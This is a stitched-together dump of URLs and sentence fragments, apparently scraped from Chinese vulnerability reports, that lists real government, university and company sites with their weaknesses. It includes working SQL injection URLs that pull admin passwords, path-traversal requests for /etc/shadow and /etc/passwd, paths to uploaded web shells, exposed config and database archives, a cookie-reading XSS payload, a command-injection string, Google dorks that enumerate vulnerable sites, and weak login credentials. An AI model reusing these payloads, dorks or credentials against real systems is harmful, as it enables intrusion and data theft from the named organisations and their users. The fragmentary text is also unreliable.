http://122.206.110.3/adksvod/ADKSAdmin/GeneralAdmin/editor/filemanager/connectors/test.html# http://202.117.122.49/ADKSAdmin/GeneralAdmin/editor/filemanager/connectors/test.html http://wsbgt.xaufe.edu.cn/ADKSAdmin/GeneralAdmin/editor/filemanager/connectors/test.html# http://219.247.104.5/adksvod/ADKSAdmin/GeneralAdmin/editor/filemanager/connectors/test.html 
http://202.203.181.10:8260/ADKSAdmin/GeneralAdmin/editor/filemanager/connectors/test.html http://mooc.dlteacher.com/ADKSVOD/ADKSAdmin/GeneralAdmin/editor/filemanager/connectors/test.html http://125.219.33.235/adksvod/ADKSAdmin/GeneralAdmin/editor/filemanager/connectors/test.html http://ksvod.tedala.gov.cn/adksvod/ADKSAdmin/GeneralAdmin/editor/filemanager/connectors/test.html http://www.wsbgt.com:82/ADKSAdmin/GeneralAdmin/editor/filemanager/connectors/test.html http://source.mastvu.ah.cn/adksvod/ADKSAdmin/GeneralAdmin/editor/filemanager/connectors/test.html http://211.81.31.35/adksvod/ADKSAdmin/GeneralAdmin/editor/filemanager/connectors/test.html http://zx.qcplay.com/Index/ http://zx.qcplay.com/News/detail/id/1670 http://verisign.itrus.com.cn/verisign.itrus.com.cn.zip http://qzgwj.com/gwjchen/ewebeditor/admin/login.php http://ls.gamefy.cn/ http://ls.gamefy.cn/detail.php?id=39 http://www.ytld.gov.cn/oa/default.asp IP:114.215.104.139 http://221.215.1.168/scopia/entry/index.jsp id:836565 PIN:123 http://i.maxthon.cn/域下,在控制台里进行) http://www.hmdz.gov.cn/view.asp?keyno=2431 http://rz-www.sd.cninfo.net/telecom/news.asp?id=43 http://www.lingzhansoft.com/dxal.asp http://jwc.nchu.edu.cn/teachweb/PreLogin.aspx http://fex.baidu.com/blog/2014/04/traffic-hijack-2/): https://bugzilla.camera360.com/show_bug.cgi?id=4818 https://bugzilla.camera360.com/buglist.cgi?product=%E4%BA%91%E7%9B%B8%E5%86%8C%EF%BC%8D%E7%A7%BB%E5%8A%A8%E7%AB%AF&component=%E4%BA%91%E7%9B%B8%E5%86%8C%E8%AE%BE%E7%BD%AE&resolution=--- http://open.lenovo.com/data/eventDefineAction.do?method=getHideEvent http://lenovobbs.lcf5.lenovo.com.cn/forum.php?mod=person_thread&uid=aa http://www.deyang12380.gov.cn/ReadView.asp?id=1498 http://www.deyang12380.gov.cn/loginAdmin.asp http://211.103.186.178:8080/ http://hao.lenovo.com/mps/api/safeNavList.php?cookieId=&pageName=1%27%20union%20all%20select%201%2C2%2C3%2C4%23 inurl:newsx.asp?id= http://59.53.91.235/hcs50/login.aspx http://www.jxjtzx.com:8088/ 
http://59.53.91.226/HCS/Login.aspx http://xt.jxyrgs.com/Login.aspx http://218.95.0.228:8089/Hcs50_CZ/login.aspx http://218.95.0.241/hcs50_cf/Login.aspx http://59.53.91.233:8080/Login.aspx http://redmine.peopleyuqing.com/projects http://www.wooyun.org/bugs/wooyun-2014-081868/trace/40964e232d0086aeea5d466dddd16277 http://118.186.218.208/ http://118.186.218.208/public http://118.186.218.208/it/maintain_api_doc/commits/master http://183.61.131.242/lichengdong/scripts http://183.61.131.242/lichengdong/scripts/blob/master/pw.txt https://play.google.com/store/apps/details?id=ctrip.english&hl=zh_CN http://mail.csztv.com/ http://www.114school.com/yxt/index.html http://115.236.101.52/weibo/theme/.svn/entries http://mail.zgmx.org.cn/ http://mail.jzbank.net/ http://admin.maxthon.cn/ http://www.haha.mx/ http://mail.stuln.com/ www.cofco.com www1.cofco.com www.cofco.com www1.cofco.com bt:/pentest/enumeration/dns/dnsenum# http://www.21wecan.com)存在两处SQL注入。 http://118.186.64.203/bdrs13part/query/queryAction.do?method=toQueryPage&uid=564 http://118.186.64.203 http://f.hismarttv.com/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\%27and+char%28@%60%27%60%29+/*!50000Union*/+/*!50000SeLect*/+1,2,3,group_concat%28userid,0x23,pwd%29,5,6,7,8,9%20from%20%60%23@__admin%60%23 http://www.sitestar.cn/help/default.aspx?type=35&category_id=31 www.sitestar.cn http://gfwl.hisense.com/fullLogin.html http://hbmt.hisense.com/cn/product.aspx?ClassID=z8UwZwanMEg%3D&Encap=1X20 http://video.sxrb.com/administrator/index.php http://srm.hisense.com:8001/SRMWeb/ http://srm.hisense.com:8001/SRMWeb/PreVendor/PreVendorRegist.aspx?Action=New http://srm.hisense.com:8001/SRMWeb/UploadFile/WebHtmlEditorFile/77.asp;.jpg http://srm.hisense.com:8001/SRMWeb/InnerPortal/noticeview.aspx?noticeid=1188 com:8001 inurl:distribution_showLogisticPage.do?orderNumber= 
http://www.haixindichan.com/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\%27and+char%28@%60%27%60%29+/*!50000Union*/+/*!50000SeLect*/+1,2,3,group_concat%28userid,0x23,pwd%29,5,6,7,8,9%20from%20%60%23@__admin%60%23 http://map.ctrip.com http://map.ctrip.com/ctrip/sendmail.jsp http://www.cxw.zjut.edu.cn|dedecms|admin http://www.tw.zjut.edu.cn|dedecms|admin http://www.szb.zjut.edu.cn|dedecms|admin http://kczy.zjut.edu.cn/gene/info_Print.asp?ArticleID=265 http://kczy.zjut.edu.cn/gene/info_Print.asp?ArticleID=265 http://跳转到一些特权域,比如mx://(会提示无法访问本地资源),这使得我们想在特权域下执行XSS来实现命令执行变得困难。 mx://res/notification/saved/index.htm http://58.215.142.39/uums/login/index.action http://58.215.142.39/uums/baobao.jsp http://hotdiamond.cn/news.asp?id=1 TOP100SUMMIT:2014年全球软件案例研究峰会存在注入点可脱裤 inurl:hn_type.asp?id= http://www.sxsimo.com/hn_type.asp?id=47 http://www.xyrip.com/hn_type.asp?id=30 http://www.sxshsy.com/hn_type.asp?id=30 http://www.gmjx.net/hn_type.asp?id=30 http://www.cgjgroup.com/hn_type.asp?id=32 http://www.xyqinxu.com/hn_type.asp?id=30 http://www.xyredcross.org/hn_type.asp?id=79 http://www.hongyefc.com/hn_type.asp?id=33 http://www.bogocorp.cn/hn_type.asp?id=192 http://www.hengtongfrp.com/hn_type.asp?id=30 http://www.029hwx.com/hn_type.asp?id=31 http://www.hnrhzy.com/hn_type.asp?id=47 http://hshjf.com/hn_type.asp?id=30 http://www.sxhaoyao.com/hn_type.asp?id=33 http://www.sxkaize.cn/hn_type.asp?id=34 http://www.sxxfn.com/hn_type.asp?id=31 http://www.xyhaian.com/hn_type.asp?id=34 http://www.sxyf.cn/hn_type.asp?id=30 http://www.yangjiayijue.com/hn_type.asp?id=31 http://goodcat.com.cn/hn_type.asp?id=30 http://www.029ndt.com/hn_type.asp?id=30 http://www.xyzqjzlw.com/hn_type.asp?id=30 http://219.143.18.106/desktop.html https://219.143.18.117/desktop.html(中国电信云计算分公司) http://update.hicloud.com:8180/TDS/data/files/p3/s15/G639/g272/v18037/f1/full/filelist.xml 
http://update.hicloud.com:8180/TDS/data/files/p3/s15/G639/g272/v18037/f1/full/changelog.xml http://hf.jjbctv.com/webusr/webuser_reg_page.aspx http://221.226.86.69:8011/webuser/webuser_reg_page.aspx http://58.222.211.21/xhweb/webusr/webuser_reg_page.aspx http://www.jseic.gov.cn:8081/jxwweb/webusr/webuser_reg_page.aspx http://61.178.185.50/lzweb/webusr/webuser_reg_page.aspx http://58.213.129.206:8080/jytweb/webusr/webuser_reg_page.aspx http://zwdt.njlh.gov.cn/webuser/webuser_reg_page.aspx http://qlyg.jiangsudoc.gov.cn/webuser/webuser_reg_page.aspx hisensephone.com/interface/alipay/alipayto.aspx?id=191&price=1099.00 hisensephone.com/interface/alipay/alipayto.aspx?id=191&price=0.01 www.zhongmin.cn)于2008年正式上线运营,是经中国保监会批准的大型保险电子商务网站,由中民保险经纪股份有限公司和中民电子商务股份有限公司共同建设与运营。中民保险经纪股份有限公司是经保监会审核批准的全国性、综合性保险经纪公司,公司注册资本5000万元人民币。2012月1月,中民保险网首批获得中国保监会批复的互联网保险业务经营资格。 https://login.zhongmin.cn/Register.aspx https://login.zhongmin.cn/FindPwd.aspx http://www.guanghan.gov.cn/admin_manage/ http://www.guanghan.gov.cn/login_szxx.asp http://www.guanghan.gov.cn/user_manage/user_index.asp http://cyjwb.jmu.edu.cn/new_view.asp?id=793 http://zb.yctc.edu.cn/EC_Usercenter.asp?action=Userinfo&id=3251 http://zb.yctc.edu.cn/EC_Usercenter.asp?action=Userinfo&id=(id后面跟2到3251都可) http://www.tipask.com/ http://www.shaolin.org.cn/console/nodemanage/node_modify.aspx http://www.minjiao.com/ http://web.ptjy.com/web/web_programs_dotnet/member/ http://www.zzyxjy.com/Web/Web_Programs_DotNet/Member/ http://school.mwedu.gov.cn/web/web_programs_dotnet/Member/ http://school.gledu.gov.cn/web/web_programs_dotnet/Member/ http://school.zzlwjy.com/web/web_programs_dotnet/member/ http://school.fjhajy.net/web/web_programs_dotnet/member/ http://schoolweb.ctjy.net/web/web_programs_dotnet/member/ http://school.fjjyjy.net/web/web_programs_dotnet/member/ http://www.ptedu.gov.cn/web/web_programs_dotnet/member/ www.qledu.gov.cn/web/web_programs_dotnet/Member/ www.mscas.ac.cn:1005/Gplugin/login.asp 
http://www.haixindichan.com/haixindichan.rar http://www.suyaxing.com/ Google:inurl:/vodweb/affiche.asp http://vod.ahlib.com/vod2005/vodweb/affiche.asp http://www.178.com/账号 http://112.53.127.12:8082/admin/login/vexist.action等等 http://sup.hisense-plaza.com/scmsup/default0.aspx http://sup.hisense-plaza.com/scmsup/MaintnPasswd.aspx http://sup.hisense-plaza.com/scmsup/MaintnPasswd.aspx http://dev.anzhuoapk.com/application/application/input?app_id=30001 http://**.**.**/Login.aspx http://10035.suning.com/mysnnet/login.htm http://v2.hisense.com:18080/Conf/jsp/main/mainAction.do http://www.wuxianled.com http://www.wuxianytk.com/webled3/index.action http://gf.hisense.grirms.com/forget_password.php?submit=true http://www.lingzhansoft.com/Products_view.asp?id=5836&tid=257 http://210.47.0.218/education/viewstudent.aspx?studentid=s000022716 http://210.47.0.218/education/viewstudent.aspx?studentid=s000022717 http://210.47.0.218/education/tutordetails.aspx?innercode=t000000088 http://www.kelonfc.com/cn/product.asp?bid=10&menu=2 http://www.kelonfc.com/cn/pshow.asp?pid=5&bid=10&sid=0&menu=2 http://www.kelonfc.com/cn/about.asp?aid=9&menu=4 http://paichu.cscse.edu.cn/OSVisa/register/login.action http://drops.wooyun.org/tips/3296 http://shop.hisense.com http://newshop.hisense.com http://shop.hisense.com http://newshop.hisense.com http://newshop.hisense.com/customer/addresses http://newshop.hisense.com http://newshop.hisense.com/orderdetails/10034 http://shop.hisense.com http://shop.hisense.com http://shop.hisense.com/Ucenter/My/pageInvoice http://111.***.**.119/ http://jikan.com.cn也是社会科学文献出版社,并且和主站在同一台服务器上,数据库也是同一台 http://jikan.com.cn http://jikan.com.cn/Web/ http://jikan.com.cn/bin/ http://jikan.com.cn/member/ http://jikan.com.cn/temp/ http://jikan.com.cn/files/ http://jikan.com.cn/admin/config/ http://jikan.com.cn//admin/insertweb/ http://jikan.com.cn/ceshi/ http://jikan.com.cn/controls/ http://jikan.com.cn/aaa/ http://jikan.com.cn/API/ http://jikan.com.cn/api/log.txt 
http://jikan.com.cn/config/ http://jikan.com.cn/logs/ http://jikan.com.cn/api/log.txt http://jikan.com.cn/admin/Log/LoginLog/14-11-04_LogMessages.xml http://jikan.com.cn/config/ConnectionStrings.rar http://sjs.baic.gov.cn/Manage/index.php,使用2#中得到的用户名密码登陆 http://sjs.baic.gov.cn/test78.php http://midh.marketviewrc.com/users/# http://211.101.142.244:8080/ http://211.101.142.244/ http://gzsc.gzlm.net/ https://www.huoqiu.cn/mobile/login/phone/is_exist.json?phoneNum=13800138000&md5str=e2009584715d2bc28ec13251867ea066&csrf_time=1415197219841&hq_phone=true https://www.huoqiu.cn/mobile/app/login_pwd/reset.json?cell=1338116****&password=123456&passwordRepeated=123456&md5str=dc17b75b4ab7ad5273dcf1396fbaeee3&csrf_time=1415195091957&hq_phone=true https://www.huoqiu.cn/mobile/app/login_pwd/reset.json?cell=1338*******&password=123456&passwordRepeated=123456&md5str=dc17b75b4ab7ad5273dcf1396fbaeee3&csrf_time=1415195091957&hq_phone=true http://aec.sdu.edu.cn/dede/index.php,使用2#中得到的用户名密码登陆 http://aec.sdu.edu.cn/uploads/test78.php http://wooyun.org/bugs/wooyun-2010-047226 http://jikan.com.cn/skwx/periodical/Period_annualCont.aspx?qik_id=20130527175642 http://jikan.com.cn/XinJK/XinSearchAll.aspx?con=3¤t=2&titleText=%27AND+1%3d%28CHAR%2895%29%2bCHAR%2833%29%2bCHAR%2864%29%2bCHAR%2850%29%2bCHAR%28100%29%2bCHAR%28105%29%2bCHAR%28108%29%2bCHAR%28101%29%2bCHAR%28109%29%2bCHAR%28109%29%2bCHAR%2897%29%29%2b%27 http://jikan.com.cn/XinJK/XinSearchAll.aspx?titleText=%27AND+1%3d%28CHAR%2895%29%2bCHAR%2833%29%2bCHAR%2864%29%2bCHAR%2850%29%2bCHAR%28100%29%2bCHAR%28105%29%2bCHAR%28108%29%2bCHAR%28101%29%2bCHAR%28109%29%2bCHAR%28109%29%2bCHAR%2897%29%29%2b%27 http://bang.liba.com/decorate/guide/10/32/1/list?z=1&source=tag http://brand.liba.com/details.php?groupId=010205257&eventId=83&reportId=513&obj=report http://www.jdbbx.com/ http://mogu.jdbbx.com/SearchPlugList.aspx?keyword=1 http://mogu.jdbbx.com/SearchPlugList.aspx?keyword=1 http://mogu.jdbbx.com/SearchPlugList.aspx?keyword=1 
http://mogu.jdbbx.com/SearchPlugList.aspx?keyword=1 http://202.98.11.30/admin.asp https://www.huoqiu.cn/asks/831.html http://www.sgsg.samsung.com/forum/qna.do?pageNo=1&searchQry=123 http://club.mingdao.com/thread-1633-1-1.html http://me.kesion.com/ http://cms.phbs.pku.edu.cn/ http://cms.phbs.pku.edu.cn/platform/users/7e4c97f293b2803128e8286bc46c85d5/1.asp;.jpg http://cms.phbs.pku.edu.cn/phpinfo.php http://219.232.241.14/ http://219.232.241.14:8090/hudson/ http://219.232.241.14/redmine/ http://www.coolyi.net/khal/ inurl:detail.asp http://www.hbfhxl.com/detail.asp?unid=233 http://www.sjzjm.com/detail.asp?unid=1279 http://drops.wooyun.org/papers/3451 http://www.efunds.com.cn/ http://111.1.15.86/ http://wzcard.com.cn/的app端 http://111.1.15.86/ECoupon.aspx?goodId=7801&qty=1 http://111.1.15.86/ECoupon.aspx?goodId=7801&qty=1 http://111.1.15.86/ECoupon.aspx?goodId=7801&qty=1 http://scm.17ugo.com/ http://10.0.4.20/newproduct/webservice.php?wsdl http://192.168.255.142:8090/UgoSCMWebService/services/SCMWebService?wsdl http://www.gyfy.gov.cn/Easypower/login.asp http://www.haitiansoft.com:8080/ https://www.huoqiu.cn/asks/831.html https://www.huoqiu.cn/asks/index.html https://www.huoqiu.cn/group/65.html http://www.xcfdc.cn/newsclass090506.php?ibelongid=7&iitypeid=51 http://www.zcwmfw.com/web/zwdt/bgxz.jsp?id=904 http://zwdt.szciqic.net/zw/external/notice!getNoticeInfo.action?id=1718496 http://zwdt.szciqic.net/zw/external/notice!getNoticeInfo.action?id=1718496 http://www.ssapchina.com/api/log.txt http://www.ssapchina.com/admin/ckfinder/ckfinder.html?action=js&f http://www.wooyun.org www.wooyun.org http://bsdt.nantong.gov.cn/riseapprove_web/bmsltxDetail.do tel:10086 http://test.m4sk.net/phone.html http://220.167.53.63:8023/zfca/ http://www.masok.cn/ http://tuan.masok.cn/index.php?m=Rss&a=index&cityname=maanshan http://xjb.nea.gov.cn/ http://xjb.nea.gov.cn/fckeditor/editor/filemanager/upload/test.html http://xjb.nea.gov.cn/UserFiles/1.aspx http://coastalbank.cn/bill.php?id=21 
http://74.125.227.77/#newwindow=1&q=inurl:AuthorVideo.aspx%3FAuthorID&btnK=Google+%E6%90%9C%E7%B4%A2 http://shanghai.com.cn/pay_des.php?id=20 http://www.ilas.com.cn/ http://www.ilas.com.cn/ProductsView.Asp?Id=3 http://www.haitiansoft.com:8080/ http://223.202.68.28/WorldCup/match.asmx?op=Match_Get_ByDate http://www.3m4.net/admin/login.php http://yulin.0912007.com/admin/login.php http://www.cwen.org/114//admin/login.php http://www.puerquan.com/daohang//admin/login.php http://www.dm566.com//admin/login.php http://95880.net//admin/login.php http://hao.56lem.com/admin/login.php http://daoh.22web.org/admin/login.php http://www.114diy.cn/admin/login.php http://56114.com.cn/admin/login.php https://58.63.228.156/login.php https://58.63.228.154/login.php http://www.zmjsjt.cn/index.htm http://www.sdwhys.com/SM2005/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 http://www.zjnksyzx.com:8801/SM2005/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 http://www.lcxyz.com:21245/SM2005/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 http://www.suyaxing.com:81/SM2005/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 http://www.hwsyxx.com/SM2005/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 http://www.dlwsxx.com/SM2005/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 url:http://xiage.yy.com/forum.php?mod=viewthread&tid=97973&page=1&extra=#pid882005 http://aa\x22\x3e\x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x31\x20\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x29\x3e//.swf[/flash][media=x,500,375 http://drops.wooyun.org/papers/3771 http://123.sogou.com/x/2012zqj/winner_list.php?callback=12345||calc http://shop.hisense.com/fp/index.html https://202.97.141.102/welcome.php inurl:/kdgs/biz/ http://www.hanchuan.gov.cn:8080/kdgs/ http://gk.sxgp.gov.cn:8080/kdgs/ http://fwzx.bazhou.gov.cn/kdgs/ http://222.163.238.198:8080/kdgs/ http://gk.sxgaoping.gov.cn:8080/kdgs/ http://gk.sxgp.gov.cn:8080/kdgs/这个站来演示。 
http://gk.sxgp.gov.cn:8080/kdgs/portal/filedownload/download.action?filename=web.xml&webPath=%2FWEB-INF%2F http://gk.sxgp.gov.cn:8080/kdgs/portal/filedownload/download.action?filename=proxool.properties&webPath=%2FWEB-INF%2Fclasses%2F http://www.hanchuan.gov.cn:8080/kdgs/portal/filedownload/download.action?filename=proxool.properties&webPath=%2FWEB-INF%2Fclasses%2F http://gk.sxgp.gov.cn:8080/kdgs/core/user/userlist.jsp http://www.hanchuan.gov.cn:8080/kdgs/core/user/userlist.jsp http://122.225.104.101:8080/default.jsp以后是超级用户.下面用户名用第一个.密码123456 gy.evergrande.com/ObjectHouseInfo.aspx?ID=13 gy.evergrande.com/newslist.aspx?c=1703 http://www.edu025.net/) inurl:/webSchool/read.aspx?ID= http://hxxx.zajyj.cn/webSchool/list.aspx?keyWords=1 http://za6z.zajyj.cn/webSchool/list.aspx?keyWords=1 http://spxx.zajyj.cn/webSchool/list.aspx?keyWords=1 http://mtxx.zajyj.cn/webSchool/list.aspx?keyWords=1 http://jzzx.zajyj.cn/webSchool/list.aspx?keyWords=1 http://zyzx.zajyj.cn/webSchool/list.aspx?keyWords=1 http://ljzx.zajyj.cn/webSchool/list.aspx?keyWords=1 http://yanxi.zajyj.cn/webSchool/list.aspx?keyWords=1 http://rxzx.zajyj.cn/webSchool/list.aspx?keyWords=1 http://glzx.zajyj.cn/webSchool/list.aspx?keyWords=1 http://www.teldlc.com/new/lynew.php?ID=900 http://www.teldlc.com/adm/login.php直接登陆后台 http://chinapost.ajonecod.com/Notice/ContentPage.aspx?ID=24 url:http://www.abcd.edu.cn/ url:http://www.abcd.edu.cn/admin/login.asp http://www.bjeea.cn/data/admin/ver.txt http://www.hisensehitachi.com/web.rar http://210.14.64.203:8080/ http://210.14.64.203:8080/docs/funcspecs/1.jsp https://cas.ruc.edu.cn/cas/login http://portal.ruc.edu.cn http://partner.locknlock.com.cn http://partner.locknlock.com.cn/test.txt http://open.lenovo.com/developer/servlet/FileDownloadServlet?fileName=../../../../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././shadow http://ts.locknlock.com.cn/commonAction!mobileLogin.action http://gjsx.js118114.com:80/ui/pages/company/publicInfo.aspx?id=161-0 
http://smtp.pipi.cn/www.1778.net/getNewsById.do?id=24&action=control http://smtp.pipi.cn/www.1778.net/images/news/xxxx.jpg.jsp http://www.gb163.com/ http://yonyou.com/en/login.html http://www.hr135.com/index.php?m=register&usertype=2 text-align:left http://221.178.251.183/ http://221.178.251.183/appCenter/loginAppInfo.action http://221.178.251.183/cmBusiManage/openBusi/showCMBusiImage.action?busi.picPath=../../../../../../../../../../etc/passwd mobileservice2.asmx/GetLearningBooks http://www.thermos.com.cn/food.php?curr_page=food_teaism_detail&id=30 http://business.nenu.edu.cn//sxyadmin/,使用2#中得到的用户名密码登陆 http://tzb.nenu.edu.cn/index.html部分源码如下 http://business.nenu.edu.cn/test78.php www.cic.cn http://xyspks.sxszb.com/XYKS/ http://www.kugou.com/musicshow/app/index.php?a=ge http://sqlmap.org http://wooyun.org/bugs/wooyun-2014-076599 http://wooyun.org/bugs/wooyun-2014-065798 http://www.wooyun.org/upload/201406/2200365508b60b3ab3a1604569c50fabd6b448f1.jpg http://www.baidu.com/s?wd=帮助%20正在读取数据...%20注册用户%20系统用户%20用户名%3A%20密码%3A%20南京苏亚星资讯科技开发&pn=50&oq=帮助%20正在读取数据...%20注册用户%20系统用户%20用户名%3A%20密码%3A%20南京苏亚星资讯科技开发&ie=utf-8&rsv_pq=bf3e63ef00016d7a&rsv_t=7c9aDgkEFKzDMR0WdiRIc8zStNMuWUt5eZkDVjpK8DDhOOqWH8Hi&rsv_page=1&f=8&rsv_bp=1&tn=baidu http://sportingbus.com/ http://fjzhyz.cn/ http://www.scyahyez.com/ http://jwculture.com/ http://183.167.250.28:85/ www.scyahyez.com http://www.scyahyez.com http://www.ftchinese.com http://www.mycodes.net/25/2089.htm http://www.pcfinal.cn/ http://www.wangluojiaoshi.com/admin/cms_login.asp http://www.tjtongxun.com/admin/cms_login.asp http://www.rj-bz.com/admin/cms_login.asp http://www.jlsty.com/admin/cms_login.asp http://www.texcrew.com/admin/cms_login.asp http://www.51yyc.com/admin/cms_login.asp http://www.baigonghuashi.cn/admin/cms_login.asp http://www.cqxhy.com/admin/cms_login.asp http://www.hd9168.com/admin/cms_login.asp http://www.86229222.com/admin/cms_login.asp http://www.wxftdz.com/admin/cms_login.asp http://**.**.**/login.jsp 
http://im.wo.cn:80/webportal/loginSp/userLogin.action http://210.14.64.201:8080/jmx-console/ http://jwxt.snnu.edu.cn/urp.zip http://42.99.16.28/login!login.do http://hblm.locknlock.com.cn/web/user/register.jsp http://hblm.locknlock.com.cn/lib/userphoto/e022da1b-a221-4113-9d7b-74b61b53aa0b.jsp http://hblm.locknlock.com.cn/lib/userphoto/c8dced8e-a2d5-49b7-89c2-8a8df1f5f3a2.jsp www.517hanguo.com http://www.517hanguo.com/article/listinfo.aspx?channel=101&id=189 http://59.151.25.14/ http://59.151.25.14/booking/showdate.php?oid=360 http://docsys.sharp.cn:8006/dealer/system/login.jsp http://docsys.sharp.cn:8006/dealer/system/news/editNew.jsp?newsID=128&page=1&keyword=0&searchType=0 http://210.75.218.69:7001/uams/ http://210.75.218.69:7001/tickProxy/1ndex.jsp http://ztb.epoint.com.cn:8090/bzbpb5_demo/login.aspx https://www.jointforce.com/ https://www.jointforce.com/jfprofile?lt=NDA1Ozs7O0RFVjs7OzsxNDE1MzM5Njk3MDgw http://eps.hikvision.com/custom/ http://eps.hikvision.com/custom/SuperMarket/Index_ItemList.aspx?1=1&keyWord=1 http://eps.hikvision.com/custom/SuperMarket/Index_ItemList.aspx?1=1&keyWord=1 http://eps.hikvision.com/custom/SuperMarket/Index_ItemList.aspx?1=1&keyWord=1 http://eps.hikvision.com/custom/SuperMarket/Index_ItemList.aspx?1=1&keyWord=1 http://222.82.245.150:808/zhyw/login.action http://www.qqhrstats.gov.cn//Admin_Set.asp http://www.fjxrkj.com/ inurl:newsView.asp?id= inurl:Productview.asp?id= inurl:newsView.asp?id= http://www.pzhivd.com/newsview.asp?sid=1&id=2 http://ecsld.com/newsview.asp?sid=2&id=3 http://www.zhfarm.com/newsView.asp?id=325 http://www.xmtfsw.com/newsView.asp?id=332 http://www.hhml.cn/news/newsview.asp?id=210 http://xn--brvs15ay9i.xn--fiqs8s/news/newsview.asp?id=203 http://fjmsyy.cn/newsview.asp?sid=2&id=8 http://www.3851885.com/NewsView.asp?ID=325&SortID=24 http://www.fjkx88.com/newsview.asp?sid=2&id=1 http://www.wpxfood.com/newsview.asp?sid=1&id=8 http://www.deniscn-gc.com/newsview.asp?id=324 
http://www.xhmfoods.com/newsview.asp?sid=&id=15 http://www.deniscn-gc.com/productview.asp?id=537 http://www.fjycsp.com/Productview.asp?id=524&act= http://www.hlhmjj.com/productview.asp?id=512 http://yibinflowe.xm04.host.35.com/ProductView.asp?id=201&SortID=132 http://www.tiefengyp.com/ProductView.asp?ID=83&SortID=139 http://www.3851885.com/ProductView.asp?id=196&SortID=129 http://www.lhncp.com.cn/pro.asp?id=54 http://www.jwjmj.com/productshow.asp?id=83&mnid=6658&classname=%D2%A3%BF%D8%C6%F7&uppage=product.asp inurl:yeNewsInfo.asp?Id= http://www.knowehow.com/yeNewsInfo.asp?Id=121 http://www.choline-chloride.cn/yeNewsInfo.asp?id=244 http://www.hksunhoo.com/yenewsinfo.asp?id=154 http://www.tbib.cn/yeNewsInfo.asp?id=4 http://www.jsxinhui.com/kr/yeNewsInfo.asp?id=47 http://www.jiayitang.net/news/yeNewsInfo.asp?id=115 http://www.hengshengjb.com/yenewsinfo.asp?id=28 http://www.tovsh.com/yeNewsInfo.asp?id=48 http://www.rs-elec.com/yeNewsInfo.asp?id=82 http://www.ydigroup.com/gb/yenewsInfo.asp?id=3 http://www.reluex.com/YeNewsInfo.asp?id=115 http://www.hwksoft.com/system/yeNewsInfo.asp?id=59 http://www.cqtkjj.com/yeNewsInfo.asp?id=56 http://www.ancpa.org/YeNewsInfo.asp?id=112 http://www.wubuzhi.net/yeNewsInfo.asp?id=117 http://www2.zzu.edu.cn/art/yeNewsInfo.asp?id=188 http://www.ys-block.com.tw/yeNewsInfo.asp?id=6 http://www.jinruifen.cn/yeNewsInfo.asp?id=100 http://www.les.cn/yeNewsInfo.asp?id=91 http://www.secwatch.com.cn/yeNewsInfo.asp?id=62 http://www.0411ln.com/yeNewsInfo.asp?id=98 http://www.chinaceramics.com/yenewsInfo.asp?id=80 http://www.pkudl.cn:80/scetrain/index.asp http://www.hspost.com.cn/hspost.rar http://www.jhpx.com/ins_vip/show.asp?ID=102 http://office.cncnc.org//yuanban/login.php http://zhaosheng.cncnc.org/uploads/test78.php http://21sb.com/ http://ysxy.sicnu.edu.cn/main_web/admin/admin_index.asp URL:http://bbs.shouyou.com/forum.php?mod=viewthread&tid=153301&page=1&extra=#pid9009501 
http://aa\x22\x3e\x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x31\x20\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x29\x3e//.swf[/flash http://5sing.kugou.com/shop/seller/serveinfo.html?sid=52d4eb0e8ead0e59380b2f9a http://210.73.83.146/lzjPrj/login.aspx http://210.73.83.146/LzjPrj/Files/registerFile/tempFile/286ecee2-d4cb-4546-b79e-d14fae67e070.aspx http://wxy.hqu.edu.cn/hqdx/xsdtx.asp?id=45 http://210.27.80.7/ http://plugins.zunyi.gov.cn/zfxxgk/zfxxgk/web/lawapply/lawapplyinfo.jsp?sysid=1&branchid=0 http://www.redcross.org.mo/en/news_full.php?no1=833 http://gprsb.ttkd.cn/ http://hnhp6660201.w215.bizcn.com/qghk_content.asp?id=13 http://admission.blcu.edu.cn/FCKeditor/_samples/default.html http://www.haitiansoft.com:8080/ http://www2.1756gps.com/ http://www.zbxsoft.com/ http://pub.mca.gov.cn/eform/form_get.jsp http://www.qzkj.net//admin_set.asp http://applistquery.wandoulabs.com/ http://ec.legendsec.com:8080/ http://ec.legendsec.com:8080/20141408031439.php http://ec.legendsec.com:8080/616.rar http://www.nxyqs.com/RecoverPasswd.aspx localhost:sqlmap http://sqlmap.org http://wooyun.org/bugs/wooyun-2014-055863 http://info.dzs.gov.cn/index.do?code={79121225-0000-0000-6A98-C4AF00000012}&templet=content_xxgkml http://60.10.19.139:8080/index.do?templet=content_xxgkzn&code=%7B20010000-FFFF-FFFF-A136-F20300000124%7D http://xxgk.laiyuan.gov.cn/index.do?templet=content_xxgkzn&code=%7BBDA60244-FFFF-FFFF-F80D-59A80000001C%7D http://www.wdzfgk.gov.cn/index.do?templet=content_xxgkzn&code=%7BDCC22573-FFFF-FFFF-E639-2B4D00000002%7D http://221.194.37.24:85/index.do?templet=content_xxgkgz&code=%7BDCC22518-FFFF-FFFF-B9A9-D85400000016%7D http://wooyun.org/bugs/wooyun-2014-073433 http://www.ycgjj.com/news/viewContent.jsp?id=111 http://mail.ikang.com/?q=resetpw进行密码重置,由于很多员工安全意识不足,导致密码找回问题很简单,比如“我是谁”,“我的手机号”等等可容易猜测的问题。 http://tiyan.sdo.com/userty/dataAjax.asp http://www.ikuaishou.com/ 
